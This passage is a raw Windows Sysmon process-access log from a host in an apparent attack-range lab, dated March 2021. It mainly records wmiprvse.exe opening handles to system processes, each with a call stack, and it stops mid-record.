10341000x80000000000000002237756Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237755Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237754Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-87AA-00000000AD01}5196C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237753Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237752Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D65-603E-87AA-00000000AD01}5196C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237751Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237750Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237749Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237748Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237747Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237746Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237745Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237744Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237743Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237742Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237741Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237740Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237739Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237738Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D65-603E-87AA-00000000AD01}519615680C:\Windows\system32\conhost.exe{05ADC7E1-6D65-603E-86AA-00000000AD01}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237737Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.d